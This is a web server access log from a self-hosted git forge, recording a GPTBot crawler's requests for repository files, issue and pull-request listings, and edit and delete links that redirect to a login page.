"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11254] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:19:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:37:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 12011] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:19:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10688] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs" [Client 74.7.227.38] [Length 20671] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:19:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:19:37:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11786] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:19:37:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11366] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 